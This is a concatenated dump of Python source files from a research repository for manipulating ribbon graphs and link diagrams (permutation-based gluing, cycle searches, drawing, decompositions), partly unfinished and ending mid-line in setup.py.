def disjoint_union(self, other_ribbon_graph):
new_op = self.opposite.disjoint_union(other_ribbon_graph.opposite)
new_next = self.next.disjoint_union(other_ribbon_graph.next)
return RibbonGraph([new_op, new_next])
def glue_along_vertex(self, label, other_ribbon_graph, other_label):
vertex = self.vertex(label)
other_vertex = other_ribbon_graph.vertex(other_label)
if len(vertex) != len(other_vertex):
raise Exception("Must glue along two vertices of same size")
def union(self, other_ribbon_graph):
"""
Combine self and other_ribbon_graph, without forcing the labels to be
different as in disjoint_union.
"""
new_opposite = self.opposite.union(other_ribbon_graph.opposite)
new_next = self.next.union(other_ribbon_graph.next)
return RibbonGraph([new_opposite, new_next])
def glue_along_face(self, label, other_ribbon_graph, other_label):
"""
Given two embedded faces (no vertex is encountered twice when walking
around boundary) of the same size on two different ribbon graphs,
glue along that boundary cycle so that label in self ends up
connected to (an opposite) other_label in other_ribbon_graph.
"""
face_length = len(self.face(label))
if len(other_ribbon_graph.face(other_label)) != face_length:
raise Exception("Faces must have same size")
cycle = EmbeddedCycle(self, label, turn_degrees = [-1]*face_length)
other_cycle = EmbeddedCycle(other_ribbon_graph, other_label, turn_degrees = [-1]*face_length).reversed()
union_ribbon_graph = self.disjoint_union(other_ribbon_graph)
for l, ol in zip(cycle.labels[:-1], other_cycle.labels[:-1]):
nl, nol = self.next[l], other_ribbon_graph.next[ol]
#the following function glues two vertices in the slots BEFORE
#the given labels. So, need to shift them by one first, as above.
union_ribbon_graph = union_ribbon_graph.vertex_merge_unmerge((nl,0),(nol,1) )
#Edges on mutual boundary are now doubled, need to cut half of them.
#we cut the ones from other_ribbon_graph, as a convention.
doubled_edges = []
for ol in other_cycle.labels[:-1]:
doubled_edges.append((ol,1))
doubled_edges.append((other_ribbon_graph.opposite[ol],1))
union_ribbon_graph = union_ribbon_graph.delete_labels(doubled_edges)
return union_ribbon_graph
def glue_faces(self, label, other_label):
"""
Given two embedded faces (no vertex is encountered twice when walking
around boundary) of the same size on two different ribbon graphs,
glue along that boundary cycle so that label in self ends up
connected to (an opposite) other_label in other_ribbon_graph.
"""
face_length = len(self.face(label))
if len(self.face(other_label)) != face_length:
raise Exception("Faces must have same size")
cycle = EmbeddedCycle(self, label, turn_degrees = [-1]*face_length)
other_cycle = EmbeddedCycle(self, other_label, turn_degrees = [-1]*face_length).reversed()
#union_ribbon_graph = self.disjoint_union(self)
for l, ol in zip(cycle.labels[:-1], other_cycle.labels[:-1]):
nl, nol = self.next[l], self.next[ol]
#the following function glues two vertices in the slots BEFORE
#the given labels. So, need to shift them by one first, as above.
self = self.vertex_merge_unmerge(nl,nol)
#Edges on mutual boundary are now doubled, need to cut half of them.
#we cut the ones from self, as a convention.
doubled_edges = []
for ol in other_cycle.labels[:-1]:
doubled_edges.append(ol)
doubled_edges.append(self.opposite[ol])
return self.delete_labels(doubled_edges)
def add_new_vertices(self, vertex_labels, vertex_size):
"""
Add a new vertex for each label in vertex_labels, with each vertex
having size vertex_size. The half edges around the vertex
corresponding to l will be labeled (l,0),(l,1),...(l,vertex_size-1).
They are not yet connected to any other vertices.
"""
new_op = self.opposite * Permutation({(l,i):(l,i) for l in vertex_labels for i in range(vertex_size)} )
new_next = self.next * Permutation(cycles = [[(l,i) for i in range(vertex_size)] for l in vertex_labels])
return RibbonGraph([new_op, new_next])
def connect_vertices(self, pairing):
pass
def remove_labels(self, labels):
old_op_labels = self.opposite.labels()
new_op = self.opposite.restricted_to(old_op_labels-set(labels))
old_next_labels = self.next.labels()
new_next = self.next.restricted_to(old_next_labels-set(labels))
return RibbonGraph([new_op, new_next])
def vertex_merge_unmerge(self,a,b):
"""
If a and b are on the same vertex, disconnects the vertex at the
corners before a and b.
If a and b are on different vertices, connects the two vertices at
the corners before a and b.
If a or b are not in the set of labels already present, this adds
a new dart
"""
return RibbonGraph(permutations = [self.opposite, self.next*Permutation({a:b,b:a})])
def orientations(self):
vertices = self.vertices()
n = self.next
o = self.opposite
orientations = {}
p = n
pi = n.inverse()
while vertices:
p = p*o*n*n
pi = pi*o*n*n
for i in p.fixed_points():
for vertex in vertices:
if i in vertex:
orientations[vertex]=1
vertices.remove(vertex)
for i in pi.fixed_points():
for vertex in vertices:
if i in vertex:
orientations[vertex]=-1
vertices.remove(vertex)
return orientations
def draw_strand_along_path(self, start, end, path):
"""
Given an EmbeddedPath in the DUAL ribbon graph
from two disconnected labels (i.e., labels 'start' and 'end'
for which self.opposite is a fixed point), create a strand from one
to the other crossing along the edges in path.
The label 'start' must be on the same face as the first label in path,
and the label 'end' must be OPPOSITE a label on the same face as the
last label in path. So, path is the sequence of edges you must cross to
get from the face containing start to the face containing end.
"""
op = self.opposite
next = self.next
if op[start] != start:
raise Exception("The start label is already connected.")
if op[end] != end:
raise Exception("The end label is already connected.")
if path.labels[0] not in self.face(start):
raise Exception("Path must begin on same face as start label.")
if self.opposite[path.labels[-1]] not in self.face(end):
raise Exception("Path must finish on a label opposite the face of the end label.")
new_ribbon_graph = self.disconnect_edges(path.labels)
new_labels = new_ribbon_graph.make_new_labels(len(path.labels))
new_ribbon_graph = new_ribbon_graph.add_new_vertices(new_labels, 4)
#Making the connections along the path itself
connections = [(start, (new_labels[0],0))]
for i in range(len(new_labels)-1):
new_label, next_new_label = new_labels[i], new_labels[i+1]
connections.append( ( (new_label,2) , (next_new_label,0) ) )
connections.append((end, (new_labels[-1], 2)))
#Making the connections on either side of the path (to the edges crossed)
for new_label, label in zip(new_labels, path.labels):
connections.append((label,(new_label,1)))
connections.append((self.opposite[label],(new_label,3)))
return new_ribbon_graph.connect_edges(connections)
def move_strand_off_crossing(self, label, ccw=True):
"""
Take the strand defined by label and move it around the vertex in the
counterclockwise direction (unless ccw is set to False).
If the number of labels around the vertex is odd, then there are no
'strands' so it raises an exception.
"""
vertex = self.vertex(label)
def permutation_subgroup(self):
op = map(tuple, self.opposite.cycles())
next = map(tuple, self.next.cycles())
return PermutationGroup([op,next])
def medial_map(self):
next_corner = self.next_corner()
next_corner_inverse = next_corner.inverse()
labels = self.labels()
new_next_dict = {}
for i in labels:
j = self.opposite[i]
new_next_dict[(i,1)] = (j, -1)
new_next_dict[(j,-1)] = (j, 1)
new_next_dict[(j,1)] = (i, -1)
new_next_dict[(i,-1)] = (i, 1)
new_next = Permutation(new_next_dict)
new_op_dict = {}
for i in labels:
for s in [-1,1]:
new_op_dict[(i,1)] = (next_corner[i],-1)
new_op_dict[(i,-1)] = (next_corner_inverse[i],1)
new_op = Permutation(new_op_dict)
return RibbonGraph(permutations=[new_op, new_next])
def PD_code(self):
vertices = self.vertices()
edges = self.edges()
pd = []
for v in vertices:
vertex_code = []
for i in v:
for j, edge in enumerate(edges):
if i in edge:
vertex_code.append(j)
break
pd.append(vertex_code)
return pd
def path_permutation(self, cycle_type):
perm = self.opposite
for turn_amount in cycle_type:
for i in range(turn_amount):
perm = perm * self.next
perm = perm*self.opposite
perm = perm*self.opposite
return perm
def search_for_cycles(self,max_turn, length):
cycle_types = []
for cycle_type in itertools.product(*[range(1,max_turn+1) for i in range(length)]):
perm = self.path_permutation(cycle_type)
if perm.fixed_points():
cycle_types.append(cycle_type)
return cycle_types
def search_for_embedded_cycles(self, max_turn, length):
cycle_types = self.search_for_cycles(max_turn, length)
cycles = []
for p in cycle_types:
pp = self.path_permutation(p)
fixed_points = pp.fixed_points()
if len(fixed_points) < self.size():
while fixed_points:
start_point = fixed_points.pop()
cycle = None
try:
cycle = EmbeddedCycle(self, start_point, turn_degrees=p)
except:
cycle = Path(self, start_point, turn_degrees=p)
fixed_points = fixed_points - set(cycle.labels)
if isinstance(cycle, EmbeddedCycle):
cycles.append(cycle)
return cycles
def search_for_embedded_cycles_through(self, start_point, length):
embedded_paths = [EmbeddedPath(self, start_point, labels = [start_point])]
for i in range(length-1):
new_paths = []
for path in embedded_paths:
new_paths.extend(path.one_step_continuations())
embedded_paths = new_paths
return [P.complete_to_cycle() for P in embedded_paths if P.is_completable_to_cycle()]
def search_for_long_embedded_cycles_through(self, start_point, max_length):
embedded_paths = [EmbeddedPath(self, start_point, labels = [start_point])]
max_length_cycles = []
for i in range(max_length-1):
new_paths = []
for path in embedded_paths:
new_paths.extend(path.one_step_continuations())
if new_paths:
embedded_paths = new_paths
cycles = [P.complete_to_cycle() for P in embedded_paths if P.is_completable_to_cycle()]
if cycles:
max_length_cycles = cycles
else:
break
return max_length_cycles
def search_for_embedded_cycle_with_start_and_goal(self, start, goal_labels, max_length):
embedded_paths = [EmbeddedPath(self, start, labels = [start])]
cycles_through_goal = []
for i in range(max_length-1):
new_paths = []
for path in embedded_paths:
new_paths.extend(path.one_step_continuations())
if new_paths:
embedded_paths = new_paths
cycles = [P.complete_to_cycle() for P in embedded_paths if P.is_completable_to_cycle()]
for cycle in cycles:
for label in cycle.labels:
if label in goal_labels:
cycles_through_goal.append(cycle)
break
else:
break
return cycles_through_goal
def copy(self):
return RibbonGraph([Permutation(self.opposite), Permutation(self.next)])
def info(self):
print("Vertices: {}\nEdges: {}\nFaces: {}".format(self.vertices(), self.edges(), self.faces()))
def random_label(self):
return choice(tuple(self.labels()))
def sage(self):
from sage.all import Graph
G = Graph(multiedges=True, loops=True)
vertices = map(tuple,self.vertices())
edges = map(tuple, self.edges())
embedding = {}
for vertex in vertices:
vertex_order = []
for label in vertex:
for edge in edges:
if label in edge:
break
G.add_edge(vertex,edge)
vertex_order.append(edge)
embedding[vertex]=vertex_order
for edge in edges:
edge_order = []
for label in edge:
for vertex in vertices:
if label in vertex:
break
edge_order.append(vertex)
embedding[edge]=edge_order
G.set_embedding(embedding)
return G
def random_link_shadow(size, edge_conn=2):
PD = map_to_link(random_map(size, edge_conn_param=edge_conn)).PD_code()
return RibbonGraph(PD=PD)
def trefoil():
next = Permutation(cycles=[('a','b','c','d'),
('e','f','g','h'),
('i','j','k','l')])
opposite = Permutation(cycles=[('a','f'),
('b','e'),
('c','l'),
('d','k'),
('i','h'),
('g','j')])
return RibbonGraph([opposite, next])
def loops():
next = Permutation(cycles=[(1,2,3,4),
(5,6,7,8)])
opposite = Permutation(cycles=[(1,5),
(2,8),
(3,4),
(6,7)])
return RibbonGraph([opposite, next])
def torus():
next = Permutation(cycles=[(1,2,3,4)])
opposite = Permutation(cycles=[(1,3),
(2,4)])
return RibbonGraph([opposite, next])
def disk_with_handles(pairing):
s = set()
for x,y in pairing:
s.add(x)
s.add(y)
l = sorted(s)
next = Permutation(cycles=[l])
opposite = Permutation(cycles=pairing)
return RibbonGraph([opposite,next])
def cube():
next = Permutation(cycles=[(1,2,3),
(4,5,6),
(7,8,9),
(10,11,12),
(13,14,15),
(16,17,18),
(19,20,21),
(22,23,24)])
opposite = Permutation(cycles=[(1,5),
(4,8),
(7,11),
(2,10),
(13,18),
(16,21),
(19,24),
(22,15),
(3,14),
(6,17),
(9,20),
(12,23)])
return RibbonGraph([opposite, next])
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,853
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/maps.py
|
from permutation import Bijection, Permutation, permutation_from_bijections
from ribbon_graph import RibbonGraph
import spherogram
class MapVertex(object):
def __init__(self, label, num_slots):
self.label = label
self.next = Permutation(cycles = [[(self.label,i) for i in range(num_slots)]])
self.opposite = Bijection()
def __repr__(self):
return self.label
def __getitem__(self, i):
return (self, i)
def __setitem__(self, i, other):
other_vertex, j = other
if self[i] in self.opposite or other_vertex[j] in other_vertex.opposite:
raise Exception("Slot already occupied")
if self[i] == other:
raise Exception("Can't connect slot to itself")
self.opposite[(self.label,i)] = (other_vertex.label, j)
other_vertex.opposite[(other_vertex.label,j)] = (self.label,i)
def __len__(self):
return len(self.next)
class StrandDiagram(object):
def __init__(self, ribbon_graph, heights, verify=True):
self.ribbon_graph = ribbon_graph
self.heights = heights
if verify:
self._verify_eulerian_and_height_rules()
def _verify_eulerian_and_height_rules(self):
labels = self.ribbon_graph.labels()
while labels:
label = labels.pop()
vertex = self.ribbon_graph.vertex(label)
heights_around_vertex = [self.heights[label]]
for other_vertex_label in vertex[1:]:
heights_around_vertex.append(self.heights[other_vertex_label])
labels.remove(other_vertex_label)
vertex_length = len(heights_around_vertex)
if (vertex_length % 2) != 0:
raise Exception("Diagram has vertex of odd degree")
first_half, second_half = heights_around_vertex[:(vertex_length//2)], heights_around_vertex[(vertex_length//2):]
if first_half != second_half:
raise Exception("Strand heights inconsistent around vertex")
if set(first_half) == set(range(len(first_half))) or set(first_half) == set([0]):
#checking that first_half is just a permutation of 0,...,len(first_half) (a normal crossing) or all zeros (a virtual crossing)
continue
else:
raise Exception("Strand heights not in allowed pattern.")
def crossing_type(self, label):
vertex = self.ribbon_graph.vertex(label)
vertex_heights = [self.heights[l] for l in vertex]
if len(set(vertex_heights)) == 1:
return 'v'
elif len(set(vertex_heights)) == 2:
return 'c'
else:
return 'm'
class Link(StrandDiagram):
def __init__(self, vertices=[], PD=[]):
if PD and not vertices:
vertices = self._vertices_from_PD(PD)
opposite = permutation_from_bijections([v.opposite for v in vertices])
next = permutation_from_bijections([v.next for v in vertices])
ribbon_graph = RibbonGraph([opposite,next])
heights = {label: label[1]%2 for label in ribbon_graph.labels()}
super(Link,self).__init__(ribbon_graph, heights)
self._verify_valence_and_heights()
def _vertices_from_PD(self, PD):
vertices = [MapVertex(i,4) for i in range(len(PD))]
edge_dict = {}
for vertex_label, edge_list in enumerate(PD):
for slot, edge in enumerate(edge_list):
if edge in edge_dict:
old_vertex_label, old_slot = edge_dict[edge]
vertices[vertex_label][slot] = vertices[old_vertex_label][old_slot]
else:
edge_dict[edge] = (vertex_label, slot)
return vertices
def _verify_valence_and_heights(self):
pass
def spherogram(self):
"""
Return a spherogram Link object.
"""
vertices = self.ribbon_graph.vertices()
edges = self.ribbon_graph.edges()
PD = []
for v in vertices:
needs_rotation = False
if self.heights[v[0]] == 1:
needs_rotation = True
vertex_code = []
for i in v:
for j, edge in enumerate(edges):
if i in edge:
vertex_code.append(j)
break
if needs_rotation:
new_vertex_code = vertex_code[1:]
new_vertex_code.append(vertex_code[0])
vertex_code = new_vertex_code
PD.append(vertex_code)
return spherogram.Link(PD)
def trefoil():
a, b, c = [MapVertex(x,4) for x in 'abc']
a[0] = b[3]
a[1] = b[2]
b[0] = c[3]
b[1] = c[2]
c[0] = a[3]
c[1] = a[2]
return Link([a,b,c])
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,854
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/draw.py
|
import matplotlib.pyplot as plt
import numpy as np
from cycle import EmbeddedCycle
from decompositions import CycleTree
def draw_with_plink(ribbon_graph):
pass
class Immersion(object):
"""
"""
def __init__(self, ribbon_graph, head, tail):
self.ribbon_graph = ribbon_graph
self.head = head
self.tail = tail
def energy(self):
pass
def perturb_downward(self, step):
pass
def perturb_randomly(self, step):
pass
def minimize_energy(self):
pass
def draw(self):
pass
class TutteSpringEmbedding(object):
def __init__(self, ribbon_graph, outer_face_label):
outer_vertices = [frozenset(ribbon_graph.vertex(l)) for l in ribbon_graph.face(outer_face_label)]
all_vertices = [frozenset(v) for v in ribbon_graph.vertices()]
outer_vertex_indices = [all_vertices.index(v) for v in outer_vertices]
print(all_vertices)
print(outer_vertices)
print(outer_vertex_indices)
self.outer_vertex_indices = outer_vertex_indices
adjacencies = []
for v in all_vertices:
opposites = [ribbon_graph.opposite[l] for l in v]
if v not in outer_vertices:
adjacencies.append([all_vertices.index(frozenset(ribbon_graph.vertex(l))) for l in opposites])
else:
adjacencies.append([])
print(adjacencies)
self.adjacencies = adjacencies
n = len(all_vertices)
spring_system = np.zeros((n,n))
for i in range(n):
spring_system[i][i] = 1
for j in adjacencies[i]:
spring_system[i,j] = -1.0/len(adjacencies[i])
print(spring_system)
self.spring_system = spring_system
ts = np.linspace(0, 2*np.pi, len(outer_vertices), endpoint = False)
bx = np.zeros(n)
for circle_index,vertex_index in enumerate(outer_vertex_indices):
bx[vertex_index] = np.cos( ts[circle_index] )
by = np.zeros(n)
for circle_index,vertex_index in enumerate(outer_vertex_indices):
by[vertex_index] = -np.sin( ts[circle_index] )
print(bx)
print(by)
self.bx = bx
self.by = by
xs = np.linalg.solve(spring_system, bx)
ys = np.linalg.solve(spring_system, by)
self.xs = xs
self.ys = ys
def plot(self, filename):
xs, ys = self.xs, self.ys
plt.scatter(xs,ys)
for v, v_adjacencies in enumerate(self.adjacencies):
for w in v_adjacencies:
edge_x = [xs[v], xs[w]]
edge_y = [ys[v], ys[w]]
plt.plot(edge_x, edge_y, color='blue')
outer_vertex_indices = self.outer_vertex_indices
for i in range(len(outer_vertex_indices)):
v, next_v = outer_vertex_indices[i], outer_vertex_indices[(i+1)%len(outer_vertex_indices)]
edge_x = [xs[v], xs[next_v]]
edge_y = [ys[v], ys[next_v]]
plt.plot(edge_x, edge_y, color='blue')
plt.savefig(filename+'.png')
class PolygonDrawing(object):
def __init__(self, vertices):
self.vertices = vertices
self.n = len(vertices)
self.min_x = min(x for x,y in vertices)
self.min_y = min(y for x,y in vertices)
self.max_x = max(x for x,y in vertices)
self.max_y = max(y for x,y in vertices)
def barycentric_coordinates(self, p):
weights = np.zeros(self.n)
for i, vertex in enumerate(self.vertices):
previous_vertex = self.vertices[(i-1)%self.n]
next_vertex = self.vertices[(i+1)%self.n]
prev_cot = self._cotangent(p, vertex, previous_vertex)
next_cot = self._cotangent(p, vertex, next_vertex)
dist = np.sum((p-vertex)*(p-vertex))
weights[i] = (prev_cot + next_cot) / dist
weights = weights/sum(weights)
return weights
def diagonal_linear_system(self, i, j):
pass
def trace_diagonal(self, i, j, stepsize, distance_goal=.01):
"""
Start at vertex i and step in the diagonal direction until you reach
vertex j.
"""
pass
def diagonal(self, i, j, epsilon = .001, sample_points = 100):
diagonal_points = []
for x in np.linspace(self.min_x, self.max_x, sample_points):
for y in np.linspace(self.min_y, self.max_y, sample_points):
weights = self.barycentric_coordinates( np.array([x,y]) )
is_diagonal = True
for k, w in enumerate(weights):
if k not in [i,j]:
if w > epsilon:
is_diagonal = False
break
if is_diagonal:
diagonal_points.append( np.array([x,y]) )
return diagonal_points
def triangulate(self):
pass
def barycentric_subdivision(self, triangulation):
pass
def parametrization(self, num_subdivisions):
pass
def _cotangent(self, a, b, c):
ba = a-b
bc = c-b
dot = sum(bc*ba)
det = np.linalg.det(np.array([bc,ba]))
return dot/abs(det)
class GluedPolygonalDrawing(object):
def __init__(self, ribbon_graph, exterior_label, max_length):
exterior_face = ribbon_graph.face(exterior_label)
cycle = EmbeddedCycle(ribbon_graph, exterior_label, turn_degrees=[-1]*len(exterior_face)).reversed()
self.cycle_tree = CycleTree(cycle, max_length)
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,855
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/local_moves.py
|
def add_vertex_on_edge(ribbon_graph, label, new_label_op, new_label_next_corner):
"""
Add a new valence 2 vertex on the edge given by label.
"""
op_label = ribbon_graph.opposite[label]
cut_edge(ribbon_graph, label)
ribbon_graph.next.add_cycle([new_label1, new_label2])
ribbon_graph.opposite[new_label1] = new_label1
ribbon_graph.opposite[new_label2] = new_label2
connect_edges(ribbon_graph, new_label1, label)
connect_edges(ribbon_graph, new_label2, op_label)
def add_edge(ribbon_graph, label1, label2, new_label1, new_label2):
"""
Add a new edge connecting the corners AFTER label1 and label2, with
the new_edge [new_label1, new_label2]
"""
ribbon_graph.next.insert_after(label1, new_label1)
ribbon_graph.next.insert_after(label2, new_label2)
ribbon_graph.opposite.add_cycle([new_label1, new_label2])
def double_edge(ribbon_graph, label, new_label1, new_label2):
op_label = ribbon_graph.opposite[label]
prev = ribbon_graph.vertex(op_label)[-1]
add_edge(ribbon_graph, label, prev, new_label1, new_label2)
def split_vertex(ribbon_graph, label1, label2):
ribbon_graph.next.split_cycle_at(label1, label2)
def merge_vertices(ribbon_graph, label1, label2):
ribbon_graph.next.merge_cycles_at(label1, label2)
def connect_edges(ribbon_graph, label1, label2):
"""
"""
if ribbon_graph.opposite[label1] == label1 and ribbon_graph.opposite[label2] == label2:
ribbon_graph.opposite.merge_cycles_at(label1, label2)
else:
raise Exception("Edges already connected.")
def cut_edge(ribbon_graph, label):
"""
Disconnect an edge, but keep the half-edge labels on each side.
"""
ribbon_graph.opposite.undo_two_cycle(label)
def delete_edge(ribbon_graph, label):
"""
Delete the entire edge, with the half-edge labels.
"""
op_label = ribbon_graph.opposite[label]
ribbon_graph.opposite.remove_cycle(label)
ribbon_graph.next.split_label_from_cycle(label)
ribbon_graph.next.split_label_from_cycle(op_label)
ribbon_graph.next.remove_fixed_point(label)
ribbon_graph.next.remove_fixed_point(op_label)
def cross_face(ribbon_graph, label1, label2, new_label1_op, new_label1_next_corner, new_label2_op, new_label2_next_corner):
assert label2 in ribbon_graph.face(label1)
add_vertex_on_edge(ribbon_graph, label1, new_label1_op)
pass #fix
def contract_edge(ribbon_graph, label):
"""
Merge the vertices on either side of the edge by collapsing the edge.
"""
op_label = ribbon_graph.opposite[label]
label_previous = ribbon_graph.next.previous(label)
op_label_previous = ribbon_graph.next.previous(op_label)
delete_edge(ribbon_graph, label)
ribbon_graph.next.merge_cycles_at(label_previous, op_label_previous)
def cut_vertex(ribbon_graph, label):
"""
Cut all edges coming out of a vertex.
"""
seen_labels = set([])
vertex = ribbon_graph.vertex(label)
for l in vertex:
if l not in seen_labels:
seen_labels.add(l)
seen_labels.add(ribbon_graph.opposite[l])
ribbon_graph.opposite.undo_two_cycle(l)
for l in vertex:
ribbon_graph.opposite.remove_fixed_point(l)
ribbon_graph.next.remove_cycle(label)
def delete_vertex(ribbon_graph, label):
seen_labels = set([])
vertex = ribbon_graph.vertex(label)
for l in vertex:
if l not in seen_labels:
seen_labels.add(l)
seen_labels.add(ribbon_graph.opposite[l])
delete_edge(ribbon_graph, l)
def contract_face(ribbon_graph, label):
"""
If the face if embedded (that is, no vertex is encountered twice when
going around the face), then it is topologically a disk. This function
collapses the disk to a single vertex.
If the face is not embedded, then this will result in an error.
"""
face = ribbon_graph.face(label)
delete_edge(ribbon_graph, label)
for l in face[1:]:
contract_edge(ribbon_graph, l)
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,856
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/decompositions.py
|
import itertools
from random import choice
from cycle import EmbeddedPath, EmbeddedCycle
class PolygonWithDiagonals(object):
"""
Numbered clockwise around the boundary, i.e. with the
exterior face to the left side
"""
def __init__(self, label, boundary_length, diagonals):
self.label = label
self.vertices = range(boundary_length)
self.diagonals = diagonals
self.boundary_length = boundary_length
self._verify_no_diagonal_crossings()
def _verify_no_diagonal_crossings(self):
for x,y in self.diagonals:
if x >= self.boundary_length or y >= self.boundary_length or x < 0 or y < 0:
raise Exception("Diagonal not in correct range.")
for pair1, pair2 in itertools.combinations(self.diagonals,2):
x,y = sorted(pair1)
a,b = sorted(pair2)
if (a < x < b < y) or (x < a < y < b):
raise Exception("Diagonals cross.")
def ribbon_graph(self):
pass
def polygon_with_diagonals_from_ribbon_graph(ribbon_graph, exterior_label):
num_vertices = len(ribbon_graph.vertices())
boundary_cycle = EmbeddedCycle(ribbon_graph, exterior_label, turn_degrees = [-1]*num_vertices)
diagonals = []
for l1, l2 in ribbon_graph.edges():
if (l1 in boundary_cycle.labels) or (l2 in boundary_cycle.labels):
continue
l1_vertex = None
l2_vertex = None
for i, label in enumerate(boundary_cycle.labels[:-1]):
if l1 in ribbon_graph.vertex(label):
l1_vertex = i
if l2 in ribbon_graph.vertex(label):
l2_vertex = i
if l1_vertex and l2_vertex:
break
diagonals.append((l1_vertex,l2_vertex))
polygon_label = str(boundary_cycle.labels[:-1])
return PolygonWithDiagonals(polygon_label, num_vertices, diagonals)
class CycleTree(object):
def __init__(self, cycle, max_length):
self.left = None
self.right = None
self.cycle = cycle
self.max_length = max_length
self.num_nonboundary_vertices = len(cycle.left_side().vertices())
if self.is_splittable():
self.split()
def __repr__(self):
return "T({})".format(self.cycle)
def is_splittable(self):
return len(self.cycle) < self.num_nonboundary_vertices
def split(self):
max_length = min(self.max_length, self.num_nonboundary_vertices+1)
cycle = self.cycle
possible_splitting_path_starts = interior_pointing_paths(cycle)
splitting_path = None
for path in possible_splitting_path_starts:
splitting_path = find_splitting_path(cycle, path, max_length)
if splitting_path:
break
cycle1, cycle2 = cycle.split_along_path(splitting_path)
self.left = CycleTree(cycle1, max_length)
self.right = CycleTree(cycle2, max_length)
def split_old(self):
cycle = self.cycle
ribbon_graph = cycle.ribbon_graph
vertices = ribbon_graph.vertices()
boundary_labels = set(cycle.labels)
num_vertices = len(vertices)
interior_labels = ribbon_graph.labels() - boundary_labels
num_boundary_vertices = len(cycle)
start_label = cycle.start_label
subcycles = ribbon_graph.search_for_embedded_cycle_with_start_and_goal(start_label, interior_labels, num_vertices)
subcycle = max(subcycles, key = len)
leftover_subcycle = cycle.oriented_sum(subcycle.reversed())
subgraph = subcycle.left_side()
leftover_subgraph = leftover_subcycle.left_side()
subcycle_pushed_to_subgraph = EmbeddedCycle(subgraph, subcycle.start_label, labels = subcycle.labels)
leftover_subcycle_pushed_to_subgraph = EmbeddedCycle(leftover_subgraph, leftover_subcycle.start_label, labels = leftover_subcycle.labels)
self.left = CycleTree(subcycle_pushed_to_subgraph)
self.right = CycleTree(leftover_subcycle_pushed_to_subgraph)
def leaves(self):
leaves = []
if self.left:
leaves.extend(self.left.leaves())
leaves.extend(self.right.leaves())
return leaves
else:
return [self]
def search_for_embedded_cycle_with_start_and_goal(self, start, goal_labels, max_length):
embedded_paths = [EmbeddedPath(self, start, labels = [start])]
cycles_through_goal = []
for i in range(max_length-1):
new_paths = []
for path in embedded_paths:
new_paths.extend(path.one_step_continuations())
if new_paths:
embedded_paths = new_paths
cycles = [P.complete_to_cycle() for P in embedded_paths if P.is_completable_to_cycle()]
for cycle in cycles:
for label in cycle.labels:
if label in goal_labels:
cycles_through_goal.append(cycle)
break
else:
break
return cycles_through_goal
def interior_pointing_paths(cycle):
boundary_vertices = set([frozenset(cycle.ribbon_graph.vertex(l)) for l in cycle.labels])
seed_paths = []
for label_list in cycle.left_side_labels():
for label in label_list:
op_label = cycle.ribbon_graph.opposite[label]
is_boundary = False
for boundary_vertex in boundary_vertices:
if op_label in boundary_vertex:
is_boundary = True
break
if not is_boundary:
seed_paths.append(EmbeddedPath(cycle.ribbon_graph, label, labels = [label]))
return seed_paths
def find_splitting_path(cycle, seed_path, max_length):
"""
Find paths starting on the cycle, going through the left side of the cycle,
and back to the cycle again.
"""
seed_paths = [seed_path]
boundary_vertices = set([frozenset(cycle.ribbon_graph.vertex(l)) for l in cycle.labels])
longest_splitting_path = None
biggest_length = 0
for i in range(max_length-1):
new_paths = []
for path in seed_paths:
new_paths.extend(path.one_step_continuations())
if new_paths:
for path in new_paths:
next_vertex = frozenset(path.next_vertex())
if (next_vertex in boundary_vertices) and (not path.is_completable_to_cycle()):
if len(path)>biggest_length:
biggest_length = len(path)
longest_splitting_path = path
else:
seed_paths.append(path)
else:
#no paths found
break
return longest_splitting_path
|
{"/ribbon_graph_base.py": ["/permutation.py", "/cycle.py"], "/maps.py": ["/permutation.py"], "/draw.py": ["/cycle.py", "/decompositions.py"], "/decompositions.py": ["/cycle.py"], "/__init__.py": ["/ribbon_graph_base.py", "/cycle.py", "/maps.py", "/permutation.py", "/trees.py", "/decompositions.py"], "/cycle.py": ["/local_moves.py"], "/trees.py": ["/ribbon_graph_base.py", "/permutation.py"], "/three_manifold.py": ["/permutation.py", "/ribbon_graph_base.py", "/cycle.py", "/local_moves.py"]}
|
27,857
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/setup.py
|
long_description = """\
This is a package for manipulating ribbon graphs
"""
import re, sys, subprocess, os, shutil, glob, sysconfig
from setuptools import setup, Command
from setuptools.command.build_py import build_py
# Get version number from module
version = re.search("__version__ = '(.*)'",
